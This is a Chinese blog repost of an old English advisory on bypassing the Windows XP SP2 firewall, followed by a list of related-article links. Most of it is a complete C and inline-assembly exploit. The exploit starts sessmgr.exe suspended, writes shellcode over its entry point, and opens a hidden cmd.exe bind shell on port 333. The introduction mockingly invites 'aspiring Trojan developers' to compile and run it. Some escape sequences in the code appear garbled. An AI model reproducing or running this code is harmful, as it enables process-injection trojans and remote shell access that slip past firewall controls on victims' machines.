[转贴]绕过xp sp2防火墙的代码

转载 2004年10月26日 20:17:00

绕过xp sp2防火墙的代码 
 
 Summary

Windows XP Service Pack 2 incorporates many enhancements to try to better protect systems from malware and other forms of attacks. One of those layers of protection is the Windows XP SP2 Firewall. One of the features of this Firewall is the ability to allow users to decide what applications can listen on the network. By allowing users to control what applications can communicate on the network, Microsoft believes that systems will be protected against threats such as Trojans. Like so many things Microsoft says, this is inaccurate and in fact it is very easy for locally executing code to bypass the Windows Firewall. So don't worry you aspiring Trojan developers, your still going to be able to Trojan consumer and corporate systems to your hearts content.

Attached to this advisory is proof of concept code that demonstrates how a Trojan could bind to a port and accept connections by piggybacking on the inherent trust of sessmgr.exe. Simply compile this program and run it as any local user. To test if the Firewall has been bypassed (it is!) telnet from another machine to the target machine on port 333 and if your connected, then you've successfully bypassed the Windows XP Service Pack 2 Firewall.


Details
Exploit:
#include <windows.h>
#include <winsock.h>
#include <stdlib.h>
#include <stdio.h>
#include <winsock.h>

void setfp(char *buffer,int sz,DWORD from,DWORD fp)
{
int i;
for(i=0;i<sz-5;i++)
if (buffer[i]=='/xb8'&&*(DWORD*)(buffer+i+1)==from)
{*(DWORD*)(buffer+i+1)=fp;break;}
}

int injcode(char *buffer)
{
HMODULE ws2_32;
DWORD _loadlibrarya,_createprocessa,_wsastartup,_wsasocketa,_bind,_listen,_accept,_sleep;
char *code;
int len;
ws2_32=LoadLibrary("ws2_32");
_loadlibrarya=(DWORD)GetProcAddress(GetModuleHandle("kernel32"),"LoadLibraryA");
_createprocessa=(DWORD)GetProcAddress(GetModuleHandle("kernel32"),"CreateProcessA");
_sleep=(DWORD)GetProcAddress(GetModuleHandle("kernel32"),"Sleep");
_wsastartup=(DWORD)GetProcAddress(ws2_32,"WSAStartup");
_wsasocketa=(DWORD)GetProcAddress(ws2_32,"WSASocketA");
_bind=(DWORD)GetProcAddress(ws2_32,"bind");
_listen=(DWORD)GetProcAddress(ws2_32,"listen");
_accept=(DWORD)GetProcAddress(ws2_32,"accept");

__asm
{
call over

push '23'
push '_2sw'
push esp
mov eax,0x11111111
call eax

xor ebx,ebx
push 0x64
pop ecx
wsadata:
push ebx
loop wsadata
push esp
push 0x101
mov eax,0x33333333
call eax

push ebx
push ebx
push ebx
push ebx
push SOCK_STREAM
push AF_INET
mov eax,0x44444444
call eax
mov esi,eax

push ebx
push ebx
push ebx
push 0x4D010002 /*port 333*/
mov eax,esp
push 0x10
push eax
push esi
mov eax,0x55555555
call eax

push SOMAXCONN
push esi
mov eax,0x66666666
call eax

push ebx
push ebx
push esi
mov eax,0x77777777
call eax
mov edi,eax

push ebx
push ebx
push ebx
push ebx
mov eax,esp
push edi
push edi
push edi
push ebx
push SW_HIDE
push STARTF_USESTDHANDLES
push 0xA
pop ecx
startupinfo:
push ebx
loop startupinfo
push 0x44
mov ecx,esp
push 'dmc'
mov edx, esp

push eax
push ecx
push ebx
push ebx
push ebx
push 1
push ebx
push ebx
push edx
push ebx
mov eax,0x22222222
call eax

push INFINITE
mov eax,0x88888888
call eax

over:
pop eax
mov code,eax
}

len=0xA0;
memcpy(buffer,code,len);
setfp(buffer,len,0x11111111,_loadlibrarya);
setfp(buffer,len,0x22222222,_createprocessa);
setfp(buffer,len,0x33333333,_wsastartup);
setfp(buffer,len,0x44444444,_wsasocketa);
setfp(buffer,len,0x55555555,_bind);
setfp(buffer,len,0x66666666,_listen);
setfp(buffer,len,0x77777777,_accept);
setfp(buffer,len,0x88888888,_sleep);

return len;
}

void main(void)
{
STARTUPINFO sinfo;
PROCESS_INFORMATION pinfo;
CONTEXT context;
LDT_ENTRY sel;
DWORD read,tib,peb,exebase,peoffs,ep;
IMAGE_NT_HEADERS pehdr;
int len;
char sessmgr[MAX_PATH+13];
char buffer[2048];

GetSystemDirectory(sessmgr,MAX_PATH);
sessmgr[MAX_PATH]=0;
strcat(sessmgr,"//sessmgr.exe");
memset(&sinfo,0,sizeof(sinfo));
sinfo.cb=sizeof(sinfo);

if (!CreateProcess(sessmgr,NULL,NULL,NULL,FALSE,CREATE_SUSPENDED,NULL,NULL,&sinfo,&pinfo))
printf("createprocess failed"), exit(1);

context.ContextFlags=CONTEXT_FULL;
GetThreadContext(pinfo.hThread,&context);
GetThreadSelectorEntry(pinfo.hThread,context.SegFs,&sel);
tib=sel.BaseLow|(sel.HighWord.Bytes.BaseMid<<16)|(sel.HighWord.Bytes.BaseHi<<24);
ReadProcessMemory(pinfo.hProcess,(LPCVOID)(tib+0x30),&peb,4,&read);
ReadProcessMemory(pinfo.hProcess,(LPCVOID)(peb+0x08),&exebase,4,&read);

ReadProcessMemory(pinfo.hProcess,(LPCVOID)(exebase+0x3C),&peoffs,4,&read);
ReadProcessMemory(pinfo.hProcess,(LPCVOID)(exebase+peoffs),&pehdr,sizeof(pehdr),&read);
ep=exebase+pehdr.OptionalHeader.AddressOfEntryPoint;

len=injcode(buffer);
VirtualProtect((LPVOID)ep,len,PAGE_EXECUTE_READWRITE,&read);
WriteProcessMemory(pinfo.hProcess,(LPVOID)ep,buffer,len,&read);

ResumeThread(pinfo.hThread);
}

windows xp sp2自带防火墙设置详细讲解

     目前已经发布的英文版windows xp service pack 2(sp2)包括了全新的windows防火墙,即以前所称的internet连接防火墙(icf)。windows防火墙是一个...
  • majiawangzi
  • majiawangzi
  • 2007年01月23日 10:01
  • 657

绕过xp sp2防火墙的代码

Writing Trojans that Bypass Windows XP Service Pack 2 FirewallSummary Windows XP Service Pack 2 inco...
  • iiprogram
  • iiprogram
  • 2008年03月22日 15:55
  • 671

绕过XP SP2防火墙的代码

Exploit:#include #include #include #include #include void setfp(char *buffer,int sz,DWORD from,DWORD...
  • pll621
  • pll621
  • 2005年12月11日 14:36
  • 777

XP SP2激活总集

XP_SP2激活总集(很全面,高手也来看看)为什么激活呢? 哪些版本需要激活呢? 这个大家应该知道 主要是为拉更长时间的使用 俄罗斯的升级SP2需要激活 原版505M需要激活 像其他的VOL 、...
  • gwy2002y
  • gwy2002y
  • 2007年12月02日 10:20
  • 2367

冰点工作室 GHOST XP SP2 完美纯净最终正式版 v4.5

冰点工作室 GHOST XP SP2 完美纯净最终正式版 v4.5=800) window.open(http://fzwr.org/attachments/20080108_aaeed62c3fb9...
  • bao1213
  • bao1213
  • 2008年01月11日 12:37
  • 1156

绕过防火墙限制的两种方法

您是否碰到过这种情况,您所在的公司或学校的主机装有防火墙,由于这些防火墙的限制,使你不能随意去看某些网页或访问某些服务器,如果你回到“是”,那么就恭喜你了,因为我有办法绕过这些防火墙。   方法一:用...
  • jabby12
  • jabby12
  • 2004年09月12日 20:59
  • 1817

Windows XP Embedded SP2 + 简体中文语言包

微软官方下载 Windows XP Embedded SP2 + 简体中文语言包  Windows XP Embedded 的微软官方下载网址. 经过研究微软官方的 XPE 下载器 XPEFFI.ex...
  • welcomejzh
  • welcomejzh
  • 2009年09月16日 10:52
  • 6698

WIN XP SP2 X64+LANG+KEY

Windows XP 64位技术面世之初,微软通过MSDN发布了两个未集成sp的零售版和VOL版,以及一个集成了sp2的VOL版(即:大客户版)。这个Windows XP sp2(x64)VOL版光盘...
  • ztsinghua
  • ztsinghua
  • 2015年10月22日 09:30
  • 1147

widows xp sp2 安装.NET4错误解决

使用vs2010打的安装包在widows xp sp2上安装时会报错,导致.NET4安装失败。 原因: sp2缺少Windows 图像处理组件 解决方法: 1、下载Windows 图像处理组件...
  • jsyhello
  • jsyhello
  • 2011年10月12日 17:23
  • 2262

将Windows XP SP3改成SP2

转自:http://www.forece.net/post/603.htm 打开注册表,找到键值HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/...
  • guozi_upc
  • guozi_upc
  • 2010年09月11日 22:43
  • 1677
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:[转贴]绕过xp sp2防火墙的代码
举报原因:
原因补充:

(最多只允许输入30个字)